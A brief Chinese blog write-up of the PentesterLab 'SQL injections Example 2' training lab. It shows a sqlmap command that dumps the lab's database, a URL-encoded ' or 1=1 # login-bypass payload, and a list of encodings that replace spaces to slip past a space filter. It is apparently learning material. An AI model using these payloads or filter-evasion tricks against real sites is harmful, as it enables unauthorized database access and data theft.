我们打开pentestlab靶机
选择“sql injections ”
选择“Example2”
观察页面
发现name是注入点
使用工具测试
sqlmap参数为
python sqlmap.py -u "http://192.168.29.148/sqli/example2.php?name=admin" --dump all
机器太卡了
我们使用手工注入
万能密码
%27/**/or/**/1=1/**/%23 相当于 ' or 1=1 #
换虚拟机
工具测试
也卡住
(那就休息)
我们打开靶机
查看源代码
将空格进行过滤
然后其他编码没有过滤。
1、%09 TAB 键(水平)
2、%0a 新建一行
3、%0c 新的一页
4、%0d return 功能
5、%0b TAB 键(垂直)
6、%a0 空格
7、/**/ 多行注释
标签:sqlmap,web,name,EXP2,空格,TAB,SQL,靶机,注入 From: https://blog.51cto.com/apple0/6114676